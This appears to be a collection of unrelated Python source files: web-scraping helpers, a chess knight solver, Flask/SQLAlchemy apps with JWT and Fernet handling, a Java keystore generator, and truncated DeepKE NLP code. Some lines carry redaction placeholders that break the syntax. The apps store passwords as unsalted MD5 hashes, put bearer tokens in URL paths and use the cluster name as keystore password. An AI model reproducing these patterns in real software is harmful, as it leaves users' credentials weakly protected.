# No need anymore for this
# write_results_to_file()
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
```
#### File: modules/urls/helpers.py
```python
import re
import requests
INVALID_SOCIAL_MEDIA_PATTERN = re.compile(r'/home\?status|/intent/|share', re.IGNORECASE|re.DOTALL)
VALID_SOCIAL_MEDIA_PATTERN = re.compile(r'twitter\.com|linkedin\.com|facebook\.com|github\.com', re.IGNORECASE|re.DOTALL)
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
def make_request_for(url):
"""
scrapes url that is from main domain website
"""
try:
r = requests.get(url, headers=HEADERS, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print("ERROR with requests to {}".format(url))
print(e)
return 500
status = r.status_code
if status >= 300:
print('error with URL: {} STATUS: {}'.format(url, status))
if status == 302:
status = r.url
else:
status = None
return status
def url_is_valid_social_media(social_url):
"""
checks if input url could contian a social media link
"""
m = re.search(INVALID_SOCIAL_MEDIA_PATTERN, social_url)
return m is None
def url_could_be_social_media(potential_social_url):
"""
checks if input url could contian a social media link
"""
m = re.search(VALID_SOCIAL_MEDIA_PATTERN, potential_social_url)
return m is not None
def url_is_new(url, object_store):
"""
checks if URL exists in reviewed storage of URLs
"""
if url in object_store: return False
if url.replace('www.', '') in object_store: return False
if url.replace('://', '://www.') in object_store: return False
if url.replace('http://', 'https://') in object_store: return False
if url.replace('https://', 'http://') in object_store: return False
if url + '/' in object_store: return False
if url[:-1] in object_store: return False
return True
def do_social_media_checks(url_lowered, all_social_links):
"""
runs all checks on social media
"""
return (
url_could_be_social_media(url_lowered) and
url_is_valid_social_media(url_lowered) and
url_is_new(url_lowered, all_social_links)
)
def url_is_image_or_css_link(url):
"""
checks if url has image link in it
"""
IMAGE_EXTENSIONS = [
'.png', '.jpg', '@md.x', '.pdf', '.calendar.google.com'
]
for ext in IMAGE_EXTENSIONS:
if ext in url: return True
return False
def url_is_valid(url, all_links):
"""
checks if url is valid
"""
if url[:7] == 'mailto:': return False
if url[-5:] == '.aspx': return False
if url_is_image_or_css_link(url): return False
if not url_is_new(url, all_links): return False
return True
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
``` |
{
"source": "johncoleman83/codewars",
"score": 3
} |
#### File: codewars/chess/min_knight_diff.py
```python
SOLUTION = [
[5, 4, 5, 4, 5, 4, 5, 6],
[4, 3, 4, 3, 4, 5, 4, 5],
[3, 4, 3, 4, 3, 4, 5, 4],
[2, 3, 2, 3, 4, 3, 4, 5],
[3, 2, 3, 2, 3, 4, 3, 4],
[2, 1, 4, 3, 2, 3, 4, 5],
[3, 2, 1, 2, 3, 4, 3, 4],
[0, 3, 2, 3, 2, 3, 4, 5]
]
R = {x: i for i, x in enumerate('87654321')}
C = {x: i for i, x in enumerate('abcdefgh')}
def knight(p1, p2):
a = [R[p1[1]], C[p1[0]]]
b = [R[p2[1]], C[p2[0]]]
print(p1, p2, a, b)
if a[0] > b[0]: pass
elif b[0] > a[0]: a, b = b, a
elif a[1] < b[1]: pass
elif b[1] < a[1]: a, b = b, a
else: return 0
if a[1] > b[1]:
a[0], b[0] = b[0], a[0]
a, b = b, a
b[0] += 7 - a[0]
b[1] -= a[1]
print('modified: ', a, b)
return SOLUTION[b[0]][b[1]]
def main_app():
a = [
['a1', 'c1', 2], ['a1', 'f1', 3], ['a1', 'f3', 3], ['a1', 'f4', 4], ['a1', 'f7', 5],
['a1', 'h8', 6], ['c3', 'h4', 4], ['c3', 'a1', 4], ['b7', 'a8', 4], ['e8', 'e1', 5],
['h6', 'b7', 3], ['b7', 'a8', 4], ['g2', 'h1', 4]
]
for x in a:
z = knight(x[0], x[1])
print('expected = {}, actual = {}'.format(x[2], z))
if __name__ == "__main__":
main_app()
``` |
{
"source": "johncoleman83/stamp",
"score": 3
} |
#### File: stamp/dev/add_images_to_db.py
```python
import json
import models
User = models.User
Image = models.Image
storage = models.storage
def load_from_json_file(filename):
"""creates json object from file"""
with open(filename, mode='r', encoding='utf-8') as f_io:
my_dict = json.loads(f_io.read())
f_io.close()
return my_dict
def store_to_db():
""" stores JSON to db """
files = [
'./images_json/lizards.json',
'./images_json/dogs.json',
'./images_json/nature.json',
'./images_json/stained_glass.json',
'./images_json/faces.json',
'./images_json/business.json',
'./images_json/goats.json',
'./images_json/religion.json'
]
num = 1
for filename in files:
json = load_from_json_file(filename)
last_name = filename.split('/')[2].split('.')[0]
u_kwargs = {
            'email': '<EMAIL>'.format(num),
'password': '<PASSWORD>',
'first_name': 'not_real_{}'.format(num),
'last_name': '{} lover'.format(last_name)
}
new_u = User(**u_kwargs)
new_u.save()
for i in json:
i_kwargs = {
"url": i.get('display_sizes')[0].get('uri'),
"title": i.get('title'),
"family": i.get('asset_family'),
"collection": i.get('collection_name')
}
new_i = Image(**i_kwargs)
new_i.save()
new_i.users.append(new_u)
new_u.images.append(new_i)
new_i.save()
new_u.save()
num += 1
if __name__ == "__main__":
"""
MAIN App
"""
store_to_db()
storage.save()
```
#### File: stamp/models/user.py
```python
from datetime import datetime, timedelta
import hashlib
import jwt
import models
from models import authentication_secret
from models.base_model import BaseModel, Base
import os
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, String, Float, DateTime, ForeignKey
from uuid import uuid4
utcnow = datetime.utcnow
SECRET_KEY = authentication_secret.SECRET_KEY
class UserImage(Base):
"""
UserImages Class
"""
__tablename__ = 'user_images'
metadata = Base.metadata
id = Column(Integer, nullable=False, primary_key=True)
user_id = Column(String(60),
ForeignKey('users.id'),
nullable=False)
image_id = Column(String(60),
ForeignKey('images.id'),
nullable=False)
class User(BaseModel, Base):
"""
User class handles all application users
"""
__tablename__ = 'users'
email = Column(String(128), nullable=False)
password = Column(String(128), nullable=False)
first_name = Column(String(128), nullable=True)
last_name = Column(String(128), nullable=True)
images = relationship('Image', secondary="user_images",
viewonly=False)
def __init__(self, *args, **kwargs):
"""
instantiates user object
"""
if kwargs:
pwd = kwargs.pop('password', None)
if pwd:
User.__set_password(self, pwd)
super().__init__(*args, **kwargs)
def pass_encryption(pwd):
"""
encrypts input to encypted string
"""
secure = hashlib.md5()
secure.update(pwd.encode("utf-8"))
secure_password = secure.hexdigest()
return secure_password
def __set_password(self, pwd):
"""
custom setter: encrypts password to MD5
"""
secure_password = User.pass_encryption(pwd)
setattr(self, "password", secure_password)
def encode_auth_token(self, user_id):
"""
Generates Auth Token
:return: string
"""
try:
payload = {
'exp': utcnow() + timedelta(days=0, seconds=3600),
'iat': utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
SECRET_KEY,
algorithm='HS256'
)
except Exception as e:
print(e)
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
            payload = jwt.decode(auth_token, SECRET_KEY, algorithms=['HS256'])
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError as e:
print(e)
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError as e:
print(e)
return 'Invalid token. Please log in again.'
class BlacklistToken(BaseModel, Base):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
token = Column(String(500), unique=True, nullable=False)
blacklisted_on = Column(
        DateTime, nullable=False, default=datetime.utcnow
)
def __init__(self, token):
"""
instantiates with BaseModel attributes
"""
self.token = token
self.blacklisted_on = utcnow()
super().__init__()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
"""
check whether auth token has been blacklisted
"""
all_tokens = models.storage.all('BlacklistToken').values()
for token_obj in all_tokens:
if token_obj.token == str(auth_token):
return True
return False
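# --- hedged sketch (not from the original repository) -----------------------
# Standalone round trip of the JWT flow that encode_auth_token and
# decode_auth_token implement; the user id is made up and the blacklist
# lookup is skipped. Uses the jwt, SECRET_KEY, utcnow and timedelta names
# already imported at the top of this file.
if __name__ == '__main__':
    demo_payload = {
        'exp': utcnow() + timedelta(seconds=3600),
        'iat': utcnow(),
        'sub': 'some-user-uuid'
    }
    demo_token = jwt.encode(demo_payload, SECRET_KEY, algorithm='HS256')
    decoded = jwt.decode(demo_token, SECRET_KEY, algorithms=['HS256'])
    print(decoded['sub'])  # -> 'some-user-uuid' while the token is unexpired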
``` |
{
"source": "johncoleman83/todo-list",
"score": 3
} |
#### File: todo-list/models/user.py
```python
from cryptography.fernet import Fernet
import hashlib
import models
from models.base_model import BaseModel, Base
from models.secrets import CIPHER
from sqlalchemy.orm import relationship
from sqlalchemy import Column, String, ForeignKey
from uuid import uuid4
class User(BaseModel, Base):
"""
User class handles all application users
"""
__tablename__ = 'users'
email = Column(String(128), nullable=False)
fbid = Column(String(128), nullable=False)
name = Column(String(128), nullable=False)
photo = Column(String(512), nullable=False)
tasks = relationship('Task', backref='task', cascade='delete')
def __init__(self, *args, **kwargs):
"""
instantiates user object
"""
REQUIRED = models.REQUIRED
if kwargs:
for req in REQUIRED:
if req not in kwargs:
return None
for key, val in kwargs.items():
kwargs[key] = User.text_encrypt(val)
super().__init__(*args, **kwargs)
def text_encrypt(text):
"""
encrypts input to encypted string
"""
text_bytes = text.encode('utf-8')
encrypted_bytes = CIPHER.encrypt(text_bytes)
encrypted_string = encrypted_bytes.decode('utf-8')
return encrypted_string
def text_decrypt(text):
"""
encrypts input to encypted string
"""
text_bytes = text.encode('utf-8')
decrypted_bytes = CIPHER.decrypt(text_bytes)
decrypted_string = decrypted_bytes.decode('utf-8')
return decrypted_string
```
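`text_encrypt` and `text_decrypt` are thin wrappers around Fernet's byte-oriented API. A self-contained round trip with a throwaway key is sketched below; the application itself loads `CIPHER` from `models.secrets`, so the key here is purely illustrative.
```python
# Sketch: the Fernet round trip that text_encrypt/text_decrypt wrap.
# A throwaway key is generated here; the app loads CIPHER from models.secrets.
from cryptography.fernet import Fernet

cipher = Fernet(Fernet.generate_key())

plaintext = 'someone@example.com'
encrypted = cipher.encrypt(plaintext.encode('utf-8')).decode('utf-8')
decrypted = cipher.decrypt(encrypted.encode('utf-8')).decode('utf-8')

print(decrypted == plaintext)  # True
```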
#### File: todo-list/web_app/app.py
```python
from datetime import datetime
from flask import abort, Flask, jsonify
from flask import render_template, request, url_for
from flask_cors import CORS, cross_origin
import json
from models import storage, Task, User, REQUIRED, APP_PORT, APP_HOST
from models.secrets import API_BEARER_TOKEN
import requests
from uuid import uuid4
# flask setup
app = Flask(__name__)
app.testing = True
app.url_map.strict_slashes = False
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
ERRORS = [
"Not a JSON", "Missing required information",
"No tasks saved yet, please save a todo task",
"Wrong id type", "Missing required user information",
"not an authenticated request"
]
def api_response(state, message, code):
"""
Method to handle errors with api
"""
time = str(datetime.utcnow())[11:19]
data = "{} {}".format(message, time)
response = {state: data, "status_code": code}
resp_json = jsonify(response)
return resp_json
@app.teardown_appcontext
def teardown_db(exception):
"""
after each request, this method calls .close() (i.e. .remove()) on
the current SQLAlchemy Session
"""
storage.close()
@app.route('/', methods=['GET'])
def main_index():
"""
handles request to main index.html
"""
if request.method == 'GET':
cache_id = uuid4()
token = User.text_encrypt(API_BEARER_TOKEN)
return render_template('index.html', token=token, cache_id=cache_id)
def make_todo_list(verified_user):
"""
makes JSON todo list for client
"""
todo_list = {}
todo_list['userInfo'] = verified_user.to_json()
all_tasks = todo_list['userInfo'].pop('tasks')
return all_tasks
@app.route('/api/<fbid>/<token>', methods=['GET'])
def api_get_handler(fbid=None, token=None):
"""
handles api get requests
"""
if fbid is None or token is None:
return api_response("error", ERRORS[2], 401)
verified_user = storage.get_user_by_fbid(fbid)
if verified_user is None:
return api_response("error", ERRORS[2], 401)
try:
encrypted_token = User.text_decrypt(token)
except Exception as e:
return api_response("error", str(e), 401)
if encrypted_token != API_BEARER_TOKEN:
return api_response("error", ERRORS[5], 401)
all_tasks = make_todo_list(verified_user)
return jsonify(all_tasks), 201
def initialize_new_task_list(user_info, all_tasks):
"""
initializes new task and user from POST request
"""
new_user = User(**user_info)
new_user.save()
user_id = new_user.id
for task in all_tasks.values():
task['user_id'] = user_id
new_task = Task(**task)
new_task.save()
return "new user and tasks created"
def update_user_tasks(verified_user, all_tasks):
"""
updates user task information
"""
user_id = verified_user.id
db_user_tasks = verified_user.tasks
db_user_task_ids = set([task.id for task in db_user_tasks])
for task_id, task in all_tasks.items():
if task_id in db_user_task_ids:
db_user_task_ids.remove(task_id)
task_to_update = storage.get("Task", task_id)
key = "{}.{}".format("Task", task_id)
value = task_to_update.get(key)
value.bm_update(task)
else:
task['user_id'] = user_id
new_task = Task(**task)
new_task.save()
if len(db_user_task_ids) > 0:
for task_id in db_user_task_ids:
task_to_delete = storage.get("Task", task_id)
key = "{}.{}".format("Task", task_id)
value = task_to_delete.get(key)
value.delete()
return "tasks updated"
def verify_proper_post_request(req_data):
"""
verifies that proper request has been made
"""
if req_data is None:
return 0
user_info = req_data.get('userInfo', None)
if user_info is None:
return 1
token = req_data.get('token')
if token is None:
return 5
try:
decrypted_token = User.text_decrypt(token)
except Exception:
return 5
if decrypted_token != API_BEARER_TOKEN:
return 5
fbid = user_info.get('fbid', None)
if fbid is None:
return 2
if isinstance(fbid, int):
return 3
for attr in REQUIRED:
if attr not in user_info:
return 4
return fbid
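# Illustrative shape of the JSON body expected by the POST handler below
# (hypothetical values; 'userInfo' must contain every field in REQUIRED,
# likely the User columns email/fbid/name/photo):
# {
#   "token": "<encrypted bearer token>",
#   "userInfo": {"fbid": "12345", "email": "a@b.c", "name": "Ann", "photo": "http://..."},
#   "allTasks": {"<task-id>": {...task fields...}, ...}
# }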
@app.route('/api', methods=['POST'])
def api_post_handler():
"""
handles api post requests
"""
req_data = request.get_json()
verification = verify_proper_post_request(req_data)
if type(verification).__name__ == "int":
return api_response("error", ERRORS[verification], 400)
user_info = req_data.get('userInfo', None)
all_tasks = req_data.get('allTasks', None)
if user_info is None or all_tasks is None:
return api_response("error", ERRORS[1], 400)
for req in REQUIRED:
if req not in user_info:
return api_response("error", ERRORS[1], 400)
verified_user = storage.get_user_by_fbid(verification)
if verified_user is None:
message = initialize_new_task_list(user_info, all_tasks)
return api_response("success", message, 200)
else:
message = update_user_tasks(verified_user, all_tasks)
return api_response("success", message, 200)
@app.errorhandler(404)
def page_not_found(error):
"""
404 page error handler
"""
cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
if __name__ == "__main__":
"""
MAIN Flask App
"""
app.run(host=APP_HOST, port=APP_PORT)
``` |
{
"source": "john-coleman/planb-cassandra",
"score": 2
} |
#### File: john-coleman/planb-cassandra/create_truststore.py
```python
import tempfile
import os
import base64
from subprocess import check_call, call
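# Overview of generate_certificate below (sketch of the three keytool steps):
#   1. -genkeypair : create a self-signed RSA key pair in a temporary keystore
#   2. -export     : export the public certificate from that keystore
#   3. -import     : import the certificate into a fresh truststore
# Both stores are protected with the cluster name as the password.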
def generate_certificate(cluster_name: str):
check = call(["which", "keytool"])
if check:
print("Keytool is not in searchpath")
return
d = tempfile.mkdtemp()
try:
keystore = os.path.join(d, 'keystore')
cmd = ["keytool", "-genkeypair",
"-alias", "planb",
"-keyalg", "RSA",
"-validity", "36000",
"-keystore", keystore,
"-dname", "c=DE, st=Berlin, l=Berlin, o=Zalando SE, cn=zalando.net",
"-storepass", <PASSWORD>_name,
"-keypass", cluster_name]
check_call(cmd)
cert = os.path.join(d, 'cert')
export = ["keytool", "-export",
"-alias", "planb",
"-keystore", keystore,
"-rfc",
"-file", cert,
"-storepass", cluster_name]
check_call(export)
truststore = os.path.join(d, 'truststore')
importcmd = ["keytool", "-import",
"-noprompt",
"-alias", "planb",
"-file", cert,
"-keystore", truststore,
"-storepass", cluster_name]
check_call(importcmd)
with open(keystore, 'rb') as fd:
keystore_data = fd.read()
with open(truststore, 'rb') as fd:
truststore_data = fd.read()
finally:
pass
return keystore_data, truststore_data
if __name__ == '__main__':
keystore, truststore = generate_certificate("test-cluster")
with open("test_keystore.base64", "wb") as fd:
fd.write(base64.b64encode(keystore))
with open("test_truststore.base64", "wb") as fd:
fd.write(base64.b64encode(truststore))
``` |
{
"source": "johncolezhang/CV-Project",
"score": 2
} |
#### File: CV-Project/project/main.py
```python
import tensorflow as tf
import sys
sys.path.insert(0, './')
from Model import *
flags = tf.app.flags
#configuration
flags.DEFINE_string("train_dir", "models", "trained model save path")
flags.DEFINE_string("samples_dir", "samples", "sampled images save path")
flags.DEFINE_string("imgs_list_path", "../models/train.txt", "images list file path")
flags.DEFINE_boolean("use_gpu", False, "whether to use gpu for training")
flags.DEFINE_integer("device_id", 0, "gpu device id")
flags.DEFINE_integer("num_epoch", 30, "train epoch num")
flags.DEFINE_integer("batch_size", 32, "batch_size")
flags.DEFINE_float("learning_rate", 4e-4, "learning rate")
conf = flags.FLAGS
def main(_):
model = Model()
model.train()
model.predict()
if __name__ == '__main__':
tf.app.run()
``` |
{
"source": "johncolezhang/DeepKE",
"score": 2
} |
#### File: few_shot/module/metrics.py
```python
import numpy as np
class Seq2SeqSpanMetric(object):
def __init__(self, eos_token_id, num_labels, target_type='word'):
self.eos_token_id = eos_token_id
self.num_labels = num_labels
self.word_start_index = num_labels+2
self.fp = 0
self.tp = 0
self.fn = 0
self.em = 0
self.total = 0
self.target_type = target_type
def evaluate(self, target_span, pred, tgt_tokens):
self.total += pred.size(0)
pred_eos_index = pred.flip(dims=[1]).eq(self.eos_token_id).cumsum(dim=1).long()
target_eos_index = tgt_tokens.flip(dims=[1]).eq(self.eos_token_id).cumsum(dim=1).long()
pred = pred[:, 1:]
tgt_tokens = tgt_tokens[:, 1:]
pred_seq_len = pred_eos_index.flip(dims=[1]).eq(pred_eos_index[:, -1:]).sum(dim=1) # bsz
pred_seq_len = (pred_seq_len - 2).tolist()
target_seq_len = target_eos_index.flip(dims=[1]).eq(target_eos_index[:, -1:]).sum(dim=1) # bsz
target_seq_len = (target_seq_len-2).tolist()
pred_spans = []
for i, (ts, ps) in enumerate(zip(target_span, pred.tolist())):
em = 0
ps = ps[:pred_seq_len[i]]
if pred_seq_len[i]==target_seq_len[i]:
em = int(tgt_tokens[i, :target_seq_len[i]].eq(pred[i, :target_seq_len[i]]).sum().item()==target_seq_len[i])
self.em += em
pairs = []
cur_pair = []
if len(ps):
for j in ps:
if j<self.word_start_index:
if self.target_type == 'span':
if len(cur_pair)>0 and len(cur_pair)%2==0:
if all([cur_pair[i]<=cur_pair[i+1] for i in range(len(cur_pair)-1)]):
pairs.append(tuple(cur_pair+[j]))
else:
if len(cur_pair) > 0:
if all([cur_pair[i]<cur_pair[i+1] for i in range(len(cur_pair)-1)]):
pairs.append(tuple(cur_pair + [j]))
cur_pair = []
else:
cur_pair.append(j)
pred_spans.append(pairs.copy())
tp, fn, fp = _compute_tp_fn_fp(pairs, ts)
self.fn += fn
self.tp += tp
self.fp += fp
def get_metric(self, reset=True):
res = {}
f, pre, rec = _compute_f_pre_rec(1, self.tp, self.fn, self.fp)
res['f'] = round(f, 4)*100
res['rec'] = round(rec, 4)*100
res['pre'] = round(pre, 4)*100
res['em'] = round(self.em/self.total, 4)
if reset:
self.total = 0
self.fp = 0
self.tp = 0
self.fn = 0
self.em = 0
return res
def _compute_f_pre_rec(beta_square, tp, fn, fp):
r"""
:param tp: int, true positive
:param fn: int, false negative
:param fp: int, false positive
:return: (f, pre, rec)
"""
pre = tp / (fp + tp + 1e-13)
rec = tp / (fn + tp + 1e-13)
f = (1 + beta_square) * pre * rec / (beta_square * pre + rec + 1e-13)
return f, pre, rec
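# Worked example (illustrative numbers): with beta_square=1, tp=8, fn=2, fp=4
# precision ~= 0.667, recall = 0.8, f ~= 0.727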
def _compute_tp_fn_fp(ps, ts):
ps = ps.copy()
tp = 0
fp = 0
fn = 0
if isinstance(ts, (set, list, np.ndarray)):
ts = {tuple(key):1 for key in list(ts)}
if isinstance(ps, (set, list, np.ndarray)):
ps = {tuple(key):1 for key in list(ps)}
for key in ts.keys():
t_num = ts[key]
if key not in ps:
p_num = 0
else:
p_num = ps[key]
tp += min(p_num, t_num)
fp += max(p_num - t_num, 0)
fn += max(t_num - p_num, 0)
if key in ps:
ps.pop(key)
fp += sum(ps.values())
return tp, fn, fp
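# Illustrative example: ps=[(1, 2)], ts=[(1, 2), (3, 4)] gives tp=1, fn=1, fp=0
# (one predicted span matches, one gold span is missed, nothing is spurious)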
```
#### File: few_shot/dataset/processor.py
```python
import csv
import pickle
import os
import logging
from tqdm import tqdm, trange
from torch.utils.data import TensorDataset
import torch.nn.functional as F
import numpy as np
import torch
from collections import OrderedDict
from transformers.utils.dummy_tokenizers_objects import BertTokenizerFast
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
# is this what an intra-package import looks like?
import json
import re
from transformers import AutoTokenizer
keyword_files = ["keyword_train.txt", "keyword_dev.txt", "keyword_test.txt"]
def tokenize(text, tokenizer):
# BERT-style tokenization
# keep the [unused0]..[unused9] placeholder tokens intact
D = [f"[unused{i}]" for i in range(10)]
textraw = [text]
for delimiter in D:
ntextraw = []
for i in range(len(textraw)):
t = textraw[i].split(delimiter)
for j in range(len(t)):
ntextraw += [t[j]]
if j != len(t)-1:
ntextraw += [delimiter]
textraw = ntextraw
text = []
for t in textraw:
if t in D:
text += [t]
else:
tokens = tokenizer.tokenize(t, add_special_tokens=False)
for tok in tokens:
text += [tok]
for idx, t in enumerate(text):
if idx + 3 < len(text) and t == "[" and text[idx+1] == "[UNK]" and text[idx+2] == "]":
text = text[:idx] + ["[MASK]"] + text[idx+3:]
return text
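# Illustrative behaviour (hypothetical input): tokenize("[unused1] : hi there", tokenizer)
# keeps "[unused1]" as a single token and wordpiece-tokenizes the remaining text.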
n_class = 1
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, text_c=None, entity=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.text_c = text_c
self.label = label
self.entity = entity
class InputExampleSST2(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, text_c=None, entity=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeaturesSST2(object):
"""A single set of features of data."""
def __init__(self, input_ids, attention_mask, token_type_ids, label_id):
self.input_ids = input_ids
self.attention_mask = attention_mask
self.token_type_ids = token_type_ids
self.label_id = label_id
class InputExampleWiki80(object):
"""A single training/test example for span pair classification."""
def __init__(self, guid, sentence, span1, span2, ner1, ner2, label):
self.guid = guid
self.sentence = sentence
self.span1 = span1
self.span2 = span2
self.ner1 = ner1
self.ner2 = ner2
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id, entity=None):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.entity = entity
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r") as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
lines.append(line)
return lines
class Sst2Processor(DataProcessor):
"""Processor for the SST-2 data set (GLUE version)."""
def __init__(self, data_dir, a):
super().__init__()
self.data_dir = data_dir
def get_example_from_tensor_dict(self, tensor_dict):
"""See base class."""
return InputExample(
tensor_dict["idx"].numpy(),
tensor_dict["sentence"].numpy().decode("utf-8"),
None,
str(tensor_dict["label"].numpy()),
)
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
text_index = 0
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, i)
text_a = line[text_index]
label = line[1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, text_c=None, label=label))
return examples
class relossProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
for sid in range(3):
# split into the three dataset splits (train/dev/test)
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
prompt = f"what is the relation between {h} and {t} ? {t} is the [MASK] {h} ."
d = [
prompt + d,
h,
t,
rid,
t
]
self.D[sid] += [d]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2], entity=data[i][4]))
return examples
class bertProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
for sid in range(3):
# split into the three dataset splits (train/dev/test)
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
sample_idx = 0
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
if use_prompt:
prompt = f"{h} is the [MASK] {t} ."
else:
prompt = f"what is the relation between {h} and {t} ?"
sample_idx += 1
d = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [d]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2]))
return examples
class ptuneProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False, ptune_k=6):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
